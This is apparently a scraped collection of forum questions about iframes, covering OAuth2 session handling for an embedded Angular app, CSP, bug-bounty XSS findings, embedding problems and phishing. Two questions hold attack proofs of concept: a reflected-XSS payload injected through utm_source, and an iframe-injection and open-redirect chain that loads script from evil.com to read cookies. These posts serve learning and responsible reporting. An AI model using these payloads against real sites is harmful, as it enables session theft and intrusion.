Oauth2.0 | How to manage user session in Single Page application running in an iframe?

I’m new to the security domain, and recently I have learned about Oauth2.0/OpenID Connect and JWT tokens. I have an existing REST-based web application where I need to implement security.

Server

Application A: Spring Boot back-end application server, with some REST endpoints exposed, connected to a MySQL database.

Front End

Application B: Spring Boot web application which has some JSP pages for login and some other template features (also connected to the same MySQL database used by the back-end server).

Application C: Inside application B we have an iframe in which an Angular app is running; the Angular app calls the back-end server and shows data.

Also in future we want to use SSO for our application as well.

Current Security

At the moment we don’t have any security on the back-end server (i.e. we can simply call REST endpoints without any authentication). Application B has basic login security implemented via Spring Security. The user logs in on application B and then he/she can use application C (Angular) as well. The user session is managed at application B; when the session expires, users are forced to log out.

Oauth2 Authorization

What we are trying to achieve is to make the server (Application A) an OAuth2 resource server and OAuth2 authorization server. Application B (JSP front end) will have the database connection removed from it, as well as the login controller; application B will call the OAuth2 server to authorize the user with the "password" flow. When application B receives the access_token and refresh_token it will then somehow pass them to the iframe (Angular app) to store these tokens inside a cookie, and on every subsequent request to the server Angular will add the access token to it.

I’ve read articles saying that OAuth2.0 has deprecated the use of the "Implicit Flow", and they prefer to use the "Authorization Code Flow". I am having a very hard time understanding how this flow can be used for single-page applications (SPAs like Angular). Also, where should I store the access_token and refresh_token if I use the implicit flow? I’m aware that storing both tokens in cookies is not a good practice.

Also, how do I manage the user session now? What I have gathered so far is that, on requesting the resource server with a Bearer access token, when we get an unauthorized response we then request a new access token with the help of the refresh token, but in case the refresh_token is also expired I will force the user to the login screen. Is this the right approach?

Sorry for the long context, any help will be highly appreciated. Thanks
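
The refresh-and-retry session handling described in the question, as an added example that is not code from the original post: a small fetch wrapper for the Angular app plus a constructed stand-in for the servers. The token endpoint path, the onLogin callback and the stand-in's responses are assumptions; tokens are kept in memory rather than in a cookie.

```javascript
// Added example (not from the original post): Bearer call -> 401 -> one refresh_token grant -> retry, else login.
// fetchImpl, tokenUrl and onLogin are injected so it runs in a browser (window.fetch) or against fakeServer below.
function createSession({ fetchImpl, tokenUrl, onLogin }) {
  let accessToken = null;   // held in closure memory, not written to a cookie
  let refreshToken = null;

  // refresh_token grant (RFC 6749 section 6); true if the server issued new tokens
  async function refresh() {
    if (!refreshToken) return false;
    const body = new URLSearchParams({ grant_type: 'refresh_token', refresh_token: refreshToken });
    const res = await fetchImpl(tokenUrl, { method: 'POST', body,
      headers: { 'Content-Type': 'application/x-www-form-urlencoded' } });
    if (res.status !== 200) return false;
    const tok = await res.json();
    accessToken = tok.access_token;
    refreshToken = tok.refresh_token || refreshToken; // adopt a rotated refresh token
    return true;
  }

  async function apiFetch(url, init = {}) {
    const call = () => fetchImpl(url, { ...init,
      headers: { ...(init.headers || {}), Authorization: `Bearer ${accessToken}` } });
    let res = await call();
    if (res.status !== 401) return res;
    if (await refresh()) {
      res = await call();                // retry exactly once with the new token
      if (res.status !== 401) return res;
    }
    accessToken = refreshToken = null;   // refresh failed or expired: end the session
    onLogin();                           // e.g. navigate the top window to the login page
    return res;
  }

  return { apiFetch, setTokens(a, r) { accessToken = a; refreshToken = r; },
           getAccessToken: () => accessToken, getRefreshToken: () => refreshToken };
}

// Constructed stand-in for Application A (resource + authorization server), not a real backend.
function fakeServer({ validAccess = 'AT2', validRefresh = 'RT1' } = {}) {
  return async (url, init = {}) => {
    if (url === '/oauth/token') {
      const p = new URLSearchParams(init.body);
      const ok = p.get('grant_type') === 'refresh_token' && p.get('refresh_token') === validRefresh;
      return ok ? { status: 200, json: async () => ({ access_token: validAccess, refresh_token: 'RT2' }) }
                : { status: 400, json: async () => ({ error: 'invalid_grant' }) };
    }
    const auth = (init.headers || {}).Authorization;
    return { status: auth === `Bearer ${validAccess}` ? 200 : 401, json: async () => ({ data: 'ok' }) };
  };
}
```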

Security Benefits of Having a Content Security Policy for a Domain Loaded through iframe

Consider the below scenario:

There’s a checkout webpage that can be accessed at checkout.example.com. This page has a decent security policy. But just to prevent any credit card info leakage, the credit card information editing panel is in an iframe, and this panel is loaded from cc.example.com.

Now, are there any security benefits to having a good Content Security Policy for cc.example.com when we are loading it in an iframe in checkout.example.com?
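
As an added example (not from the original question), a policy that cc.example.com itself could send: CSP directives apply to the framed document, so they limit what a script injected into the card panel could load or post to, and frame-ancestors limits which pages may embed the panel. The api.example.com host is an assumption.

```http
Content-Security-Policy: default-src 'none'; script-src 'self'; style-src 'self'; img-src 'self'; connect-src https://api.example.com; form-action https://api.example.com; frame-ancestors https://checkout.example.com; base-uri 'none'
```

Browsers that support frame-ancestors ignore X-Frame-Options when both headers are present, so the CSP is the one to get right.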

IFrame Vulnerability Classification

I was participating in a bug bounty on a website we will call example.com when I ran into a very strange edge case which I am not sure I should report. The website uses ads and tracking similar to Google Analytics from a website we can call tracking.com. When visiting the example website there is an iframe to the tracking website. The source of the iframe can be seen below.

    <body>
    <script type="text/javascript">
      ((function (e, t) {
        var n = function () {
          var e = t.createElement("iframe");
          e.src = "https://tracking.com/container/?utm_source=[INJECT]";
          e.style.cssText = "position: absolute";
          t.body.appendChild(e)
        }
        if (t.readyState === "complete") {
          n()
        } else {
          if (typeof e.addEventListener !== "undefined") {
            t.addEventListener("DOMContentLoaded", n, false)
          } else {
            e.attachEvent("onload", n, false)
          }
        }
      })(window, document));
    </script>
    </body>

The example website also has a parameter called utm_source, through which JavaScript can be injected into the iframe (where I placed [INJECT] in the code above). For example, visiting https://example.com/?utm_source=";</script><script>alert(document.domain)</script> yields the alert "embedded page at tracking.com says tracking.com". The issue is that the tracking website is not in scope of the bug bounty, and I am not even sure that the issue is caused by the tracking website. It seems like the example website allows the user to inject arbitrary JS into the iframe of the tracking website. Is this a bug worth reporting, or am I missing some easy way of escaping the iframe?

So far I have tried injecting </iframe> and things like e.onload=alert(1) to escape the iframe but have not been successful. Since the example and tracking websites are on different domains, I cannot access things in the parent website (example) from the tracking website due to the “X-Frame-Options” header set to “SAMEORIGIN”.

As a beginner, this bug has me very confused as to how it should be classified and whether it is exploitable in any way. Any tips would be greatly appreciated!

My iframe on google drive folder is blocked

WordPress refuses to add this custom iframe markup:

<iframe src="https://drive.google.com/embeddedfolderview?id=1N2LwnSIJDevKh0TBiEy6Kp4p-jvyJUwJ#list" style="width:100%; height:600px; border:0;"></iframe> 

I have the free plan and I’m not able to add plugins. Is it possible to add an iframe that links to a Google Drive folder with the free plan and without plugins? If yes, then how can I achieve this?

Embed Iframe inside a Facebook post to allow users in emergency situations to report us

My company needs to collect emergency data from our Facebook page fans.
We are doing an experiment to allow some users who are located very far from emergency services to report their cases on our Facebook page (very long story).

So we want to place an iframe with a form that was optimized for a very long time.

I saw an app that is doing that: https://quiz-app.co/

But I don’t have a clue how they did that.

Thanks

Why an invisible iframe to logout from Office in a Office phishing?

In a phishing page for an Office account (a login page mimicking the normal login page and stealing the credentials through a simple AJAX request, then navigating to a dummy public Google Doc), attackers have put an invisible iframe with the URL

https://login.microsoftonline.com/logout.srf?ct=1548343592&rver=64.4.6456.0&lc=1033&id=501392 

Why would they do that? I don’t see the point.

iframe in sharepoint

Referring to content from this SharePoint and iFrames (This content cannot be displayed in a frame), I have added allow framing in one of the web apps in SharePoint 2013 to make apps work.

But now it’s giving an error in SharePoint’s layout page Upload.aspx. When I try to upload a document it’s not showing the modal pop-up.

The error comes only in Google Chrome. IE doesn’t have any issue.

XSS in iframe can’t access document cookies

I know of a website, let’s call it website.com, that has these vulnerabilities:

  1. iframe injection: I can inject an iframe with a src attribute, but cannot inject any script directly. Let’s say that this is on website.com/iframeinjection.

  2. uncontrolled redirect vulnerability: website.com/link?path=google.com redirects to google.com.

Chaining these two vulnerabilities together, I used the iframe injection to insert something like this on website.com/iframeinjection:

<iframe src="website.com/link?path=evil.com/index.html"></iframe> 

This bypasses the same-origin policy, since the base URL is website.com, and this script from evil.com/index.html is executed in website.com/iframeinjection:

    <!DOCTYPE html>
    <html>
    <head></head>
    <body>
      <script>
        alert(1);
        alert(document.cookie);
      </script>
    </body>
    </html>

When visiting website.com/iframeinjection though, the alert(1) alerts 1 as usual, but the alert(document.cookie) cannot access the cookie from website.com, even though the JavaScript is being executed on the outside of the iframe. Why is this? Is this a legitimate vulnerability? Is there any way this could be used to steal cookies?

Incorrect iframe implementation

Some context: we are using a third-party authentication platform where e-commerce sites can choose to display this platform within an iframe during their checkout process. We have media queries that detect the iframe size and thus tell the site which size/screen design to display. The problem is, sometimes, and we do not know for sure why at the moment, the screen will appear cut off within the iframe. Attaching an image for clarity. The user is unable to scroll or drag the screen to get to the CTA and will feel compelled to abandon the transaction.

Now, we feel strongly that this is a technical issue, but I am still being instructed to provide a design (visual) solution(s). For example, adding directional arrows to the UI so a user can still navigate in case scrolling is not enabled. Has anyone ever had to deal with something like this? Any advice for designing or implementing iframes?


Thanks!